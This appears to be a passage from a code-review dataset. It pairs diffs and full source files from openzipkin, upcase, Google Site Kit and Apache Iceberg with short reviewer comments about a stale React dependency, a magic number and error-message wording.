// This should prevent the collection tier from being able to calculate duration.
accept(span.toBuilder().addAnnotation(ms).build());
accept(span.toBuilder().addAnnotation(mr).build());
// Normally, span store implementations will merge spans by id and add duration by query time
assertThat(store().getTrace(span.traceId))
.containsExactly(span.toBuilder()
.timestamp(ms.timestamp)
.duration(mr.timestamp - ms.timestamp)
.annotations(asList(ms, mr)).build());
// Since a collector never saw both sides of the span, we'd not see duration in the raw trace.
for (Span raw : store().getRawTrace(span.traceId)) {
assertThat(raw.timestamp).isNull();
assertThat(raw.duration).isNull();
}
}
@Test public void getTraces_acrossServices() {
List<BinaryAnnotation> annotations = IntStream.rangeClosed(1, 10).mapToObj(i ->
BinaryAnnotation.create(LOCAL_COMPONENT, "serviceAnnotation",
Endpoint.create("service" + i, 127 << 24 | i)))
.collect(Collectors.toList());
long gapBetweenSpans = 100;
List<Span> earlySpans = IntStream.rangeClosed(1, 10).mapToObj(i -> Span.builder().name("early")
.traceId(i).id(i).timestamp((today - i) * 1000).duration(1L)
.addBinaryAnnotation(annotations.get(i - 1)).build()).collect(toList());
List<Span> lateSpans = IntStream.rangeClosed(1, 10).mapToObj(i -> Span.builder().name("late")
.traceId(i + 10).id(i + 10).timestamp((today + gapBetweenSpans - i) * 1000).duration(1L)
.addBinaryAnnotation(annotations.get(i - 1)).build()).collect(toList());
accept(earlySpans.toArray(new Span[10]));
accept(lateSpans.toArray(new Span[10]));
List<Span>[] earlyTraces =
earlySpans.stream().map(Collections::singletonList).toArray(List[]::new);
List<Span>[] lateTraces =
lateSpans.stream().map(Collections::singletonList).toArray(List[]::new);
//sanity checks
assertThat(store().getTraces(QueryRequest.builder().serviceName("service1").build()))
.containsExactly(lateTraces[0], earlyTraces[0]);
assertThat(store().getTraces(QueryRequest.builder().limit(20).build()))
.hasSize(20);
assertThat(store().getTraces(QueryRequest.builder().limit(10).build()))
.containsExactly(lateTraces);
assertThat(store().getTraces(QueryRequest.builder().limit(20)
.endTs(today + gapBetweenSpans).lookback(gapBetweenSpans).build()))
.containsExactly(lateTraces);
assertThat(store().getTraces(QueryRequest.builder().limit(20)
.endTs(today).build()))
.containsExactly(earlyTraces);
}
static long clientDuration(Span span) {
long[] timestamps = span.annotations.stream()
.filter(a -> a.value.startsWith("c"))
.mapToLong(a -> a.timestamp)
.sorted().toArray();
return timestamps[1] - timestamps[0];
}
}
| 1 | 11,785 | before, a binary annotation had the same service name as a regular annotation, masking the bug where we weren't querying the latter | openzipkin-zipkin | java |
@@ -1,4 +1,6 @@
class Exercise < ActiveRecord::Base
+ AVERAGE_COMPLETION_TIME_IN_MINUTES = 7
+
has_many :statuses, as: :completeable, dependent: :destroy
has_one :trail, through: :step, as: :completeables
has_one :step, dependent: :destroy, as: :completeable | 1 | class Exercise < ActiveRecord::Base
has_many :statuses, as: :completeable, dependent: :destroy
has_one :trail, through: :step, as: :completeables
has_one :step, dependent: :destroy, as: :completeable
validates :name, presence: true
validates :url, presence: true
def trail_name
trail.try(:name)
end
def self.ordered
order(:created_at)
end
def accessible_without_subscription?
false
end
end
| 1 | 18,416 | Where does the `7` come from? | thoughtbot-upcase | rb |
@@ -48,7 +48,7 @@ export default function CountrySelect() {
timezone: countriesByCode[ newCountryCode ].defaultTimeZoneId,
} );
}
- }, [ setValues ] );
+ }, [ setValues, value ] );
return (
<Select | 1 | /**
* CountrySelect component.
*
* Site Kit by Google, Copyright 2021 Google LLC
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* https://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
/**
* WordPress dependencies
*/
import { useCallback } from '@wordpress/element';
import { __ } from '@wordpress/i18n';
/**
* Internal dependencies
*/
import {
Select,
Option,
} from '../../../../../material-components';
import { allCountries, countriesByCode } from '../../../util/countries-timezones';
import Data from 'googlesitekit-data';
import { FORM_ACCOUNT_CREATE } from '../../../datastore/constants';
import { CORE_FORMS } from '../../../../../googlesitekit/datastore/forms/constants';
const { useSelect, useDispatch } = Data;
export default function CountrySelect() {
const value = useSelect( ( select ) => select( CORE_FORMS ).getValue( FORM_ACCOUNT_CREATE, 'countryCode' ) );
const { setValues } = useDispatch( CORE_FORMS );
const onEnhancedChange = useCallback( ( i, item ) => {
const newCountryCode = item.dataset.value;
if ( newCountryCode !== value && countriesByCode[ newCountryCode ] ) {
setValues( FORM_ACCOUNT_CREATE, {
countryCode: newCountryCode,
// eslint-disable-next-line sitekit/acronym-case
timezone: countriesByCode[ newCountryCode ].defaultTimeZoneId,
} );
}
}, [ setValues ] );
return (
<Select
className="googlesitekit-analytics__select-country"
label={ __( 'Country', 'google-site-kit' ) }
value={ value }
onEnhancedChange={ onEnhancedChange }
enhanced
outlined
>
{
allCountries.map( ( { countryCode, displayName }, i ) => (
<Option
key={ i }
value={ countryCode }
>
{ displayName }
</Option>
) )
}
</Select>
);
}
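
// Editor's note: an illustrative sketch, not part of the original component, showing why
// `value` belongs in the dependency array patched above. With `[ setValues ]` alone the
// callback keeps the `value` captured on its first render, so `newCountryCode !== value`
// can compare against a stale country code. The helper name below is hypothetical.
// eslint-disable-next-line no-unused-vars
function makeCountryChangeHandler( value, setValues ) {
	// Recreated whenever `value` changes, so the comparison always sees the current selection.
	return ( newCountryCode ) => {
		if ( newCountryCode !== value && countriesByCode[ newCountryCode ] ) {
			setValues( FORM_ACCOUNT_CREATE, { countryCode: newCountryCode } );
		}
	};
}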
| 1 | 37,758 | I don't know how we haven't got bugs from some of these! As here this would have had a stale `value` | google-site-kit-wp | js |
@@ -199,6 +199,9 @@ public class SparkCatalog extends BaseCatalog {
setSnapshotId = set;
} else if ("cherry-pick-snapshot-id".equalsIgnoreCase(set.property())) {
pickSnapshotId = set;
+ } else if ("sort-order".equalsIgnoreCase(set.property())) {
+ throw new UnsupportedOperationException("'sort-order' is a reserved table property. Please use the command " +
+ "'ALTER TABLE ... WRITE ORDERED BY' to specify it.");
} else {
propertyChanges.add(set);
} | 1 | /*
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
* under the License.
*/
package org.apache.iceberg.spark;
import java.util.List;
import java.util.Map;
import java.util.Set;
import java.util.TreeMap;
import org.apache.hadoop.conf.Configuration;
import org.apache.iceberg.CachingCatalog;
import org.apache.iceberg.CatalogUtil;
import org.apache.iceberg.Schema;
import org.apache.iceberg.Table;
import org.apache.iceberg.Transaction;
import org.apache.iceberg.catalog.Catalog;
import org.apache.iceberg.catalog.Namespace;
import org.apache.iceberg.catalog.SupportsNamespaces;
import org.apache.iceberg.catalog.TableIdentifier;
import org.apache.iceberg.exceptions.AlreadyExistsException;
import org.apache.iceberg.hadoop.HadoopCatalog;
import org.apache.iceberg.hadoop.HadoopTables;
import org.apache.iceberg.relocated.com.google.common.base.Preconditions;
import org.apache.iceberg.relocated.com.google.common.base.Splitter;
import org.apache.iceberg.relocated.com.google.common.collect.ImmutableMap;
import org.apache.iceberg.relocated.com.google.common.collect.ImmutableSet;
import org.apache.iceberg.relocated.com.google.common.collect.Lists;
import org.apache.iceberg.relocated.com.google.common.collect.Maps;
import org.apache.iceberg.relocated.com.google.common.collect.Sets;
import org.apache.iceberg.spark.source.SparkTable;
import org.apache.iceberg.spark.source.StagedSparkTable;
import org.apache.spark.sql.SparkSession;
import org.apache.spark.sql.catalyst.analysis.NamespaceAlreadyExistsException;
import org.apache.spark.sql.catalyst.analysis.NoSuchNamespaceException;
import org.apache.spark.sql.catalyst.analysis.NoSuchTableException;
import org.apache.spark.sql.catalyst.analysis.TableAlreadyExistsException;
import org.apache.spark.sql.connector.catalog.Identifier;
import org.apache.spark.sql.connector.catalog.NamespaceChange;
import org.apache.spark.sql.connector.catalog.StagedTable;
import org.apache.spark.sql.connector.catalog.TableCatalog;
import org.apache.spark.sql.connector.catalog.TableChange;
import org.apache.spark.sql.connector.catalog.TableChange.ColumnChange;
import org.apache.spark.sql.connector.catalog.TableChange.RemoveProperty;
import org.apache.spark.sql.connector.catalog.TableChange.SetProperty;
import org.apache.spark.sql.connector.expressions.Transform;
import org.apache.spark.sql.types.StructType;
import org.apache.spark.sql.util.CaseInsensitiveStringMap;
/**
* A Spark TableCatalog implementation that wraps an Iceberg {@link Catalog}.
* <p>
* This supports the following catalog configuration options:
* <ul>
* <li><code>type</code> - catalog type, "hive" or "hadoop"</li>
* <li><code>uri</code> - the Hive Metastore URI (Hive catalog only)</li>
* <li><code>warehouse</code> - the warehouse path (Hadoop catalog only)</li>
* <li><code>default-namespace</code> - a namespace to use as the default</li>
* </ul>
* <p>
* To use a custom catalog that is not a Hive or Hadoop catalog, extend this class and override
* {@link #buildIcebergCatalog(String, CaseInsensitiveStringMap)}.
*/
public class SparkCatalog extends BaseCatalog {
private static final Set<String> DEFAULT_NS_KEYS = ImmutableSet.of(TableCatalog.PROP_OWNER);
private String catalogName = null;
private Catalog icebergCatalog = null;
private boolean cacheEnabled = true;
private SupportsNamespaces asNamespaceCatalog = null;
private String[] defaultNamespace = null;
private HadoopTables tables;
/**
* Build an Iceberg {@link Catalog} to be used by this Spark catalog adapter.
*
* @param name Spark's catalog name
* @param options Spark's catalog options
* @return an Iceberg catalog
*/
protected Catalog buildIcebergCatalog(String name, CaseInsensitiveStringMap options) {
Configuration conf = SparkSession.active().sessionState().newHadoopConf();
Map<String, String> optionsMap = new TreeMap<>(String.CASE_INSENSITIVE_ORDER);
optionsMap.putAll(options);
return CatalogUtil.buildIcebergCatalog(name, optionsMap, conf);
}
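  // Editor's note: a hypothetical sketch, not part of the original class. The class Javadoc says
  // custom catalogs plug in by extending SparkCatalog and overriding buildIcebergCatalog; a
  // minimal subclass would look roughly like this (it simply delegates to the default here).
  private static class ExampleCustomSparkCatalog extends SparkCatalog {
    @Override
    protected Catalog buildIcebergCatalog(String name, CaseInsensitiveStringMap options) {
      // A real implementation would construct and return its own Catalog instance instead.
      return super.buildIcebergCatalog(name, options);
    }
  }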
/**
* Build an Iceberg {@link TableIdentifier} for the given Spark identifier.
*
* @param identifier Spark's identifier
* @return an Iceberg identifier
*/
protected TableIdentifier buildIdentifier(Identifier identifier) {
return Spark3Util.identifierToTableIdentifier(identifier);
}
@Override
public SparkTable loadTable(Identifier ident) throws NoSuchTableException {
try {
Table icebergTable = load(ident);
return new SparkTable(icebergTable, !cacheEnabled);
} catch (org.apache.iceberg.exceptions.NoSuchTableException e) {
throw new NoSuchTableException(ident);
}
}
@Override
public SparkTable createTable(Identifier ident, StructType schema,
Transform[] transforms,
Map<String, String> properties) throws TableAlreadyExistsException {
Schema icebergSchema = SparkSchemaUtil.convert(schema);
try {
Catalog.TableBuilder builder = newBuilder(ident, icebergSchema);
Table icebergTable = builder
.withPartitionSpec(Spark3Util.toPartitionSpec(icebergSchema, transforms))
.withLocation(properties.get("location"))
.withProperties(Spark3Util.rebuildCreateProperties(properties))
.create();
return new SparkTable(icebergTable, !cacheEnabled);
} catch (AlreadyExistsException e) {
throw new TableAlreadyExistsException(ident);
}
}
@Override
public StagedTable stageCreate(Identifier ident, StructType schema, Transform[] transforms,
Map<String, String> properties) throws TableAlreadyExistsException {
Schema icebergSchema = SparkSchemaUtil.convert(schema);
try {
Catalog.TableBuilder builder = newBuilder(ident, icebergSchema);
Transaction transaction = builder.withPartitionSpec(Spark3Util.toPartitionSpec(icebergSchema, transforms))
.withLocation(properties.get("location"))
.withProperties(Spark3Util.rebuildCreateProperties(properties))
.createTransaction();
return new StagedSparkTable(transaction);
} catch (AlreadyExistsException e) {
throw new TableAlreadyExistsException(ident);
}
}
@Override
public StagedTable stageReplace(Identifier ident, StructType schema, Transform[] transforms,
Map<String, String> properties) throws NoSuchTableException {
Schema icebergSchema = SparkSchemaUtil.convert(schema);
try {
Catalog.TableBuilder builder = newBuilder(ident, icebergSchema);
Transaction transaction = builder.withPartitionSpec(Spark3Util.toPartitionSpec(icebergSchema, transforms))
.withLocation(properties.get("location"))
.withProperties(Spark3Util.rebuildCreateProperties(properties))
.replaceTransaction();
return new StagedSparkTable(transaction);
} catch (org.apache.iceberg.exceptions.NoSuchTableException e) {
throw new NoSuchTableException(ident);
}
}
@Override
public StagedTable stageCreateOrReplace(Identifier ident, StructType schema, Transform[] transforms,
Map<String, String> properties) {
Schema icebergSchema = SparkSchemaUtil.convert(schema);
Catalog.TableBuilder builder = newBuilder(ident, icebergSchema);
Transaction transaction = builder.withPartitionSpec(Spark3Util.toPartitionSpec(icebergSchema, transforms))
.withLocation(properties.get("location"))
.withProperties(Spark3Util.rebuildCreateProperties(properties))
.createOrReplaceTransaction();
return new StagedSparkTable(transaction);
}
@Override
public SparkTable alterTable(Identifier ident, TableChange... changes) throws NoSuchTableException {
SetProperty setLocation = null;
SetProperty setSnapshotId = null;
SetProperty pickSnapshotId = null;
List<TableChange> propertyChanges = Lists.newArrayList();
List<TableChange> schemaChanges = Lists.newArrayList();
for (TableChange change : changes) {
if (change instanceof SetProperty) {
SetProperty set = (SetProperty) change;
if (TableCatalog.PROP_LOCATION.equalsIgnoreCase(set.property())) {
setLocation = set;
} else if ("current-snapshot-id".equalsIgnoreCase(set.property())) {
setSnapshotId = set;
} else if ("cherry-pick-snapshot-id".equalsIgnoreCase(set.property())) {
pickSnapshotId = set;
} else {
propertyChanges.add(set);
}
} else if (change instanceof RemoveProperty) {
propertyChanges.add(change);
} else if (change instanceof ColumnChange) {
schemaChanges.add(change);
} else {
throw new UnsupportedOperationException("Cannot apply unknown table change: " + change);
}
}
try {
Table table = load(ident);
commitChanges(table, setLocation, setSnapshotId, pickSnapshotId, propertyChanges, schemaChanges);
} catch (org.apache.iceberg.exceptions.NoSuchTableException e) {
throw new NoSuchTableException(ident);
}
return null;
}
@Override
public boolean dropTable(Identifier ident) {
try {
return isPathIdentifier(ident) ?
tables.dropTable(((PathIdentifier) ident).location()) :
icebergCatalog.dropTable(buildIdentifier(ident));
} catch (org.apache.iceberg.exceptions.NoSuchTableException e) {
return false;
}
}
@Override
public void renameTable(Identifier from, Identifier to) throws NoSuchTableException, TableAlreadyExistsException {
try {
checkNotPathIdentifier(from, "renameTable");
checkNotPathIdentifier(to, "renameTable");
icebergCatalog.renameTable(buildIdentifier(from), buildIdentifier(to));
} catch (org.apache.iceberg.exceptions.NoSuchTableException e) {
throw new NoSuchTableException(from);
} catch (AlreadyExistsException e) {
throw new TableAlreadyExistsException(to);
}
}
@Override
public void invalidateTable(Identifier ident) {
try {
load(ident).refresh();
} catch (org.apache.iceberg.exceptions.NoSuchTableException ignored) {
// ignore if the table doesn't exist, it is not cached
}
}
@Override
public Identifier[] listTables(String[] namespace) {
return icebergCatalog.listTables(Namespace.of(namespace)).stream()
.map(ident -> Identifier.of(ident.namespace().levels(), ident.name()))
.toArray(Identifier[]::new);
}
@Override
public String[] defaultNamespace() {
if (defaultNamespace != null) {
return defaultNamespace;
}
return new String[0];
}
@Override
public String[][] listNamespaces() {
if (asNamespaceCatalog != null) {
return asNamespaceCatalog.listNamespaces().stream()
.map(Namespace::levels)
.toArray(String[][]::new);
}
return new String[0][];
}
@Override
public String[][] listNamespaces(String[] namespace) throws NoSuchNamespaceException {
if (asNamespaceCatalog != null) {
try {
return asNamespaceCatalog.listNamespaces(Namespace.of(namespace)).stream()
.map(Namespace::levels)
.toArray(String[][]::new);
} catch (org.apache.iceberg.exceptions.NoSuchNamespaceException e) {
throw new NoSuchNamespaceException(namespace);
}
}
throw new NoSuchNamespaceException(namespace);
}
@Override
public Map<String, String> loadNamespaceMetadata(String[] namespace) throws NoSuchNamespaceException {
if (asNamespaceCatalog != null) {
try {
return asNamespaceCatalog.loadNamespaceMetadata(Namespace.of(namespace));
} catch (org.apache.iceberg.exceptions.NoSuchNamespaceException e) {
throw new NoSuchNamespaceException(namespace);
}
}
throw new NoSuchNamespaceException(namespace);
}
@Override
public void createNamespace(String[] namespace, Map<String, String> metadata) throws NamespaceAlreadyExistsException {
if (asNamespaceCatalog != null) {
try {
if (asNamespaceCatalog instanceof HadoopCatalog && DEFAULT_NS_KEYS.equals(metadata.keySet())) {
// Hadoop catalog will reject metadata properties, but Spark automatically adds "owner".
// If only the automatic properties are present, replace metadata with an empty map.
asNamespaceCatalog.createNamespace(Namespace.of(namespace), ImmutableMap.of());
} else {
asNamespaceCatalog.createNamespace(Namespace.of(namespace), metadata);
}
} catch (AlreadyExistsException e) {
throw new NamespaceAlreadyExistsException(namespace);
}
} else {
throw new UnsupportedOperationException("Namespaces are not supported by catalog: " + catalogName);
}
}
@Override
public void alterNamespace(String[] namespace, NamespaceChange... changes) throws NoSuchNamespaceException {
if (asNamespaceCatalog != null) {
Map<String, String> updates = Maps.newHashMap();
Set<String> removals = Sets.newHashSet();
for (NamespaceChange change : changes) {
if (change instanceof NamespaceChange.SetProperty) {
NamespaceChange.SetProperty set = (NamespaceChange.SetProperty) change;
updates.put(set.property(), set.value());
} else if (change instanceof NamespaceChange.RemoveProperty) {
removals.add(((NamespaceChange.RemoveProperty) change).property());
} else {
throw new UnsupportedOperationException("Cannot apply unknown namespace change: " + change);
}
}
try {
if (!updates.isEmpty()) {
asNamespaceCatalog.setProperties(Namespace.of(namespace), updates);
}
if (!removals.isEmpty()) {
asNamespaceCatalog.removeProperties(Namespace.of(namespace), removals);
}
} catch (org.apache.iceberg.exceptions.NoSuchNamespaceException e) {
throw new NoSuchNamespaceException(namespace);
}
} else {
throw new NoSuchNamespaceException(namespace);
}
}
@Override
public boolean dropNamespace(String[] namespace) throws NoSuchNamespaceException {
if (asNamespaceCatalog != null) {
try {
return asNamespaceCatalog.dropNamespace(Namespace.of(namespace));
} catch (org.apache.iceberg.exceptions.NoSuchNamespaceException e) {
throw new NoSuchNamespaceException(namespace);
}
}
return false;
}
@Override
public final void initialize(String name, CaseInsensitiveStringMap options) {
this.cacheEnabled = Boolean.parseBoolean(options.getOrDefault("cache-enabled", "true"));
Catalog catalog = buildIcebergCatalog(name, options);
this.catalogName = name;
this.tables = new HadoopTables(SparkSession.active().sessionState().newHadoopConf());
this.icebergCatalog = cacheEnabled ? CachingCatalog.wrap(catalog) : catalog;
if (catalog instanceof SupportsNamespaces) {
this.asNamespaceCatalog = (SupportsNamespaces) catalog;
if (options.containsKey("default-namespace")) {
this.defaultNamespace = Splitter.on('.')
.splitToList(options.get("default-namespace"))
.toArray(new String[0]);
}
}
}
@Override
public String name() {
return catalogName;
}
private static void commitChanges(Table table, SetProperty setLocation, SetProperty setSnapshotId,
SetProperty pickSnapshotId, List<TableChange> propertyChanges,
List<TableChange> schemaChanges) {
// don't allow setting the snapshot and picking a commit at the same time because order is ambiguous and choosing
// one order leads to different results
Preconditions.checkArgument(setSnapshotId == null || pickSnapshotId == null,
"Cannot set the current the current snapshot ID and cherry-pick snapshot changes");
if (setSnapshotId != null) {
long newSnapshotId = Long.parseLong(setSnapshotId.value());
table.manageSnapshots().setCurrentSnapshot(newSnapshotId).commit();
}
// if updating the table snapshot, perform that update first in case it fails
if (pickSnapshotId != null) {
long newSnapshotId = Long.parseLong(pickSnapshotId.value());
table.manageSnapshots().cherrypick(newSnapshotId).commit();
}
Transaction transaction = table.newTransaction();
if (setLocation != null) {
transaction.updateLocation()
.setLocation(setLocation.value())
.commit();
}
if (!propertyChanges.isEmpty()) {
Spark3Util.applyPropertyChanges(transaction.updateProperties(), propertyChanges).commit();
}
if (!schemaChanges.isEmpty()) {
Spark3Util.applySchemaChanges(transaction.updateSchema(), schemaChanges).commit();
}
transaction.commitTransaction();
}
private static boolean isPathIdentifier(Identifier ident) {
return ident instanceof PathIdentifier;
}
private static void checkNotPathIdentifier(Identifier identifier, String method) {
if (identifier instanceof PathIdentifier) {
throw new IllegalArgumentException(String.format("Cannot pass path based identifier to %s method. %s is a path.",
method, identifier));
}
}
private Table load(Identifier ident) {
return isPathIdentifier(ident) ?
tables.load(((PathIdentifier) ident).location()) :
icebergCatalog.loadTable(buildIdentifier(ident));
}
private Catalog.TableBuilder newBuilder(Identifier ident, Schema schema) {
return isPathIdentifier(ident) ?
tables.buildTable(((PathIdentifier) ident).location(), schema) :
icebergCatalog.buildTable(buildIdentifier(ident), schema);
}
}
| 1 | 35,959 | One nit here I forgot about this before but we usually structure error messages as "Cannot X because Y. Then the recommendation goes here" I would also recommend not using "it" in the message since it the pronoun is a bit ambiguous. "to specify write sort-order" may be clearer | apache-iceberg | java |
@@ -26,7 +26,8 @@ import {
} from '../../../../../tests/js/utils';
import * as CacheModule from '../../../googlesitekit/api/cache';
import { STORE_NAME } from './constants';
-import initialState, {
+import {
+ initialState,
FEATURE_TOUR_COOLDOWN_SECONDS,
FEATURE_TOUR_LAST_DISMISSED_AT,
} from './feature-tours'; | 1 | /**
* `core/user` data store: feature tours tests.
*
* Site Kit by Google, Copyright 2021 Google LLC
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* https://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
/**
* Internal dependencies
*/
import {
createTestRegistry,
muteFetch,
untilResolved,
} from '../../../../../tests/js/utils';
import * as CacheModule from '../../../googlesitekit/api/cache';
import { STORE_NAME } from './constants';
import initialState, {
FEATURE_TOUR_COOLDOWN_SECONDS,
FEATURE_TOUR_LAST_DISMISSED_AT,
} from './feature-tours';
const { setItem } = CacheModule;
describe( 'core/user feature-tours', () => {
let registry;
let store;
let setItemSpy;
const testTourA = {
slug: 'test-tour-a',
version: '2.0.0',
contexts: [ 'common-context' ],
steps: [
{
title: 'Test Tour A - Step 1 Title',
content: 'Test Tour A - Step 1 Content',
target: 'test-tour-a-step-1-target',
},
],
};
const testTourB = {
slug: 'test-tour-b',
version: '2.1.0',
contexts: [ 'common-context', 'b-only-context' ],
steps: [
{
title: 'Test Tour B - Step 1 Title',
content: 'Test Tour B - Step 1 Content',
target: 'test-tour-b-step-1-target',
},
],
};
beforeEach( () => {
setItemSpy = jest.spyOn( CacheModule, 'setItem' );
registry = createTestRegistry();
store = registry.stores[ STORE_NAME ].store;
registry.dispatch( STORE_NAME ).receiveInitialSiteKitVersion( '1.0.0' );
} );
afterEach( () => {
setItemSpy.mockRestore();
} );
describe( 'actions', () => {
describe( 'dismissTour', () => {
const fetchDismissTourRegExp = /^\/google-site-kit\/v1\/core\/user\/data\/dismiss-tour/;
it( 'requires a slug parameter', () => {
expect( () => registry.dispatch( STORE_NAME ).dismissTour() )
.toThrow( /a tour slug is required/i );
} );
it( 'adds the slug to dismissedTourSlugs immediately', () => {
muteFetch( fetchDismissTourRegExp, [] );
expect( store.getState().dismissedTourSlugs ).toBe( initialState.dismissedTourSlugs );
expect( store.getState().dismissedTourSlugs || [] ).not.toContain( 'test-tour' );
registry.dispatch( STORE_NAME ).dismissTour( 'test-tour' );
expect( store.getState().dismissedTourSlugs ).toContain( 'test-tour' );
} );
it( 'dispatches a fetch request to persist the dismissal', async () => {
muteFetch( fetchDismissTourRegExp, [] );
await registry.dispatch( STORE_NAME ).dismissTour( 'test-tour' );
expect( fetchMock ).toHaveFetched( fetchDismissTourRegExp );
} );
it( 'receives all dismissed tours as the new state from the server', async () => {
fetchMock.postOnce( fetchDismissTourRegExp, { body: [ 'tour-a', 'tour-b' ] } );
await registry.dispatch( STORE_NAME ).dismissTour( 'tour-b' );
expect( store.getState().dismissedTourSlugs ).toEqual(
expect.arrayContaining( [ 'tour-a', 'tour-b' ] )
);
} );
it( 'sets the lastDismissedAt timestamp to mark the start of the cooldown period', async () => {
muteFetch( fetchDismissTourRegExp, [] );
await registry.dispatch( STORE_NAME ).dismissTour( 'test-tour' );
expect( store.getState().lastDismissedAt ).toBeDefined();
// cache should have been set as well
expect( setItemSpy ).toHaveBeenCalledWith(
FEATURE_TOUR_LAST_DISMISSED_AT,
expect.any( Number ), // timestamp
expect.objectContaining( { ttl: FEATURE_TOUR_COOLDOWN_SECONDS } ),
);
} );
} );
describe( 'receiveAllFeatureTours', () => {
it( 'requires tours to be an array', () => {
expect( () => registry.dispatch( STORE_NAME ).receiveAllFeatureTours() )
.toThrow( 'tours must be an array' );
} );
it( 'receives the given tours into the state', () => {
const tours = [ testTourA, testTourB ];
registry.dispatch( STORE_NAME ).receiveAllFeatureTours( tours );
expect( store.getState().tours ).toEqual( tours );
} );
} );
describe( 'receiveFeatureToursForView', () => {
it( 'requires viewTours to be an array', () => {
expect( () => registry.dispatch( STORE_NAME ).receiveFeatureToursForView() )
.toThrow( 'viewTours must be an array' );
} );
it( 'requires a viewContext to be provided for the viewTours', () => {
expect( () => registry.dispatch( STORE_NAME ).receiveFeatureToursForView( [] ) )
.toThrow( 'viewContext is required' );
} );
it( 'receives the given viewTours into the state for the viewContext', () => {
const tours = [ testTourA, testTourB ];
registry.dispatch( STORE_NAME ).receiveFeatureToursForView( tours, { viewContext: 'foo' } );
expect( store.getState().viewTours.foo ).toEqual( tours );
} );
} );
describe( 'receiveLastDismissedAt', () => {
it( 'requires a timestamp to be provided', () => {
expect( () => registry.dispatch( STORE_NAME ).receiveLastDismissedAt() )
.toThrow( 'A timestamp is required.' );
} );
it( 'sets the lastDismissedAt timestamp in the store', () => {
const timestamp = Date.now();
registry.dispatch( STORE_NAME ).receiveLastDismissedAt( timestamp );
expect( store.getState().lastDismissedAt ).toEqual( timestamp );
} );
} );
describe( 'setLastDismissedAt', () => {
it( 'requires a timestamp to be provided', () => {
expect( () => registry.dispatch( STORE_NAME ).receiveLastDismissedAt() )
.toThrow( 'A timestamp is required.' );
} );
it( 'sets the lastDismissedAt timestamp in the store', async () => {
const timestamp = Date.now();
await registry.dispatch( STORE_NAME ).setLastDismissedAt( timestamp );
expect( store.getState().lastDismissedAt ).toEqual( timestamp );
} );
it( 'sets the lastDismissedAt timestamp in the cache', async () => {
const timestamp = Date.now();
await registry.dispatch( STORE_NAME ).setLastDismissedAt( timestamp );
expect( setItemSpy ).toHaveBeenCalledWith(
FEATURE_TOUR_LAST_DISMISSED_AT,
timestamp,
expect.objectContaining( { ttl: FEATURE_TOUR_COOLDOWN_SECONDS } )
);
} );
} );
} );
describe( 'selectors', () => {
const fetchGetDismissedToursRegExp = /^\/google-site-kit\/v1\/core\/user\/data\/dismissed-tours/;
describe( 'getDismissedFeatureTourSlugs', () => {
it( 'returns the initial state before the resolver runs', () => {
muteFetch( fetchGetDismissedToursRegExp, [] );
expect( registry.select( STORE_NAME ).getDismissedFeatureTourSlugs() ).toBe( initialState.dismissedTourSlugs );
} );
it( 'receives dismissed tours from the fetch dispatched by the resolver', async () => {
fetchMock.getOnce( fetchGetDismissedToursRegExp, { body: [ 'feature-x' ] } );
registry.select( STORE_NAME ).getDismissedFeatureTourSlugs();
await untilResolved( registry, STORE_NAME ).getDismissedFeatureTourSlugs();
expect( registry.select( STORE_NAME ).getDismissedFeatureTourSlugs() ).toEqual( [ 'feature-x' ] );
expect( fetchMock ).toHaveFetched();
} );
it( 'does not fetch if there are already dismissed tours in state', () => {
registry.dispatch( STORE_NAME ).receiveGetDismissedTours( [] );
registry.select( STORE_NAME ).getDismissedFeatureTourSlugs();
expect( fetchMock ).not.toHaveFetched();
} );
it( 'returns the list of dismissed tours', () => {
registry.dispatch( STORE_NAME ).receiveGetDismissedTours( [] );
expect( registry.select( STORE_NAME ).getDismissedFeatureTourSlugs() ).toEqual( [] );
registry.dispatch( STORE_NAME ).receiveGetDismissedTours( [ 'tour-a', 'feature-x' ] );
expect( registry.select( STORE_NAME ).getDismissedFeatureTourSlugs() ).toEqual(
expect.arrayContaining( [ 'feature-x', 'tour-a' ] )
);
} );
} );
describe( 'getFeatureToursForView', () => {
beforeEach( () => {
registry.dispatch( STORE_NAME ).receiveGetDismissedTours( [] );
} );
it( 'returns `undefined` while tour readiness is being resolved', () => {
expect(
registry.select( STORE_NAME ).getFeatureToursForView( 'test-view-context' )
).toBeUndefined();
} );
it( 'returns an array of tours that qualify for the given view context', async () => {
registry.dispatch( STORE_NAME ).receiveAllFeatureTours( [ testTourA, testTourB ] );
expect(
await registry.__experimentalResolveSelect( STORE_NAME ).getFeatureToursForView( 'common-context' )
).toEqual( [ testTourA, testTourB ] );
expect(
await registry.__experimentalResolveSelect( STORE_NAME ).getFeatureToursForView( 'b-only-context' )
).toEqual( [ testTourB ] );
} );
it( 'returns an array of tours that have a version greater than the user’s initial Site Kit version', async () => {
const initialVersion = '1.0.0';
const tourVersion = '2.0.0';
registry.dispatch( STORE_NAME ).receiveInitialSiteKitVersion( initialVersion );
registry.dispatch( STORE_NAME ).receiveAllFeatureTours( [
{ ...testTourA, version: initialVersion },
{ ...testTourB, version: tourVersion },
] );
// Tour A's version matches the user's initial version, so only Tour B is returned.
const viewTours = await registry.__experimentalResolveSelect( STORE_NAME ).getFeatureToursForView( 'common-context' );
expect( viewTours.map( ( { slug } ) => slug ) ).toEqual( [ testTourB.slug ] );
} );
it( 'returns an array of tours that have not been dismissed by the user yet', async () => {
